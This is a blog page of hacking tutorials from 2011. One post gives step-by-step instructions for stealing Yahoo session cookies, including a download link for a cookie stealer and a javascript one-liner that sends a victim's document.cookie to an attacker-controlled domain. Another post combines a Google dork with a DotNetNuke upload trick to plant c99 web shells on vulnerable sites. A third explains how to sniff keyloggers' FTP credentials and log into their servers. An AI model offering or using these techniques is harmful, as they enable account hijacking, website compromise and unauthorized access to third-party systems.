Subscribe Email Alerts | Enter your email address :

Tuesday, February 8, 2011

Hack Yahoo accounts with Session IDs or session cookies !

Hello Friends, This is an Guest post By Mr. Aneesh M. Makker admin of http://www.explorehacking.com/ on "Hack Yahoo accounts with Session IDs or session cookies".


What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thank you for reading this Article.
Admin.

Monday, January 24, 2011

Indian Cyber Army (Reg.) Celebrating "Republic Day 2011" Together on Facebook !!

Indian Cyber Army (Reg.) Celebrating 
"Republic Day 2011" Together on Facebook !!


Indian Cyber Army (http://www.indiancyberarmy.org/ ) was registered in Jan 2011 under govt. Indian Cyber Army is leading three most important departments of cyber world.
Read Complete post here....

More than 1000+ Facebook Users Using The below Picture as there Profile pic , to Celebrating "Republic Day 2011" Together on Facebook !!

We have target to cover 10000 Facebook profiles till 26th January !! Please Keep the below image as your profile picture at-least till 31st jan-2011 .

Become the part of this Event :
Step 1 : "Save as Image" Below image in your computer.

Step 2 : Now upload the image as your new Facebook profile Picture !!

Done !! Thank you !!
If you have any query then Join n ask Us : Click Here

Thursday, January 20, 2011

Portal Hacking (DNN) - Website Hacking Technique Explained !


Hello frnds, One more hacking method called "Portal Hacking (DNN)". This method also uses google search to find hackable sites.. Now you can imagine that how much google.com is important for Hackers also...

Lets start the tutorials...

Step 1 :
http://www.google.com

Step 2:Now enter this dork

:inurl:/tabid/36/language/en-US/Default.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
you will find many sites, Select the site which you are comfortable with.

Step 4: 
For example take this site.
Example:

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8:
Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9:You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 etc etc 

Hope all of like my articles...  Please comment !
Admin.

Decode Keyloggers and Stealers - Get passwords of Hackers !


Hello, here method to hack the hackers..If you have a keylogger on your computer, and you know the file, this process will easily give you the FTP website they are using so you can get the logs for the files, and if they use the same keyloggers on other computers, you’ll get the logs for that to.

What is Reverting ?
Reverting generally means reversing an action or undoing the changes. Here in our case, reverting would be more of reversing the action. For this we will need a key logger server using ftp. It can be found on warez sites, you tube etc.

Tools needed:
1) Key logger, pass stealer
2) Cain and Abel
3) Virtual machine (so you don't get infected, and what if the hacker is using better protocol that'd be epic fail)

Follow the Following Steps.....
1.) Execute the key logger on your virtual machine.

2.) Now run Cain and Abel and do the following things as per stated order.



3.) Wait for sometime and then check back the passwords area.
4







4


4.) As you can see the key logger used ftp protocol to transfer the logs. Ftp protocol isn't very safe since it doesn't encrypt the data. Anyways you should see the ip address where your pc is sending packets. And also the user name and password. This might not work if the server is using other protocol like http smtp etc you'll most probably get junk values in user and pass box if those protocols are used.

So i open the ip address http://66.220.9.50/







5.) Now you have username and pass from "Cain and Abel" ... So Login and Hit The Hacker !!!!

Hope that ,this article will be helpful for you, now go and collect all viruses and try this method... Hope u will get good Results..
Admin,ICA.

 
  • Recent Articles

  • Popular Articles

  • Recent Comments

To Get Latest Update Subscribe Now !!!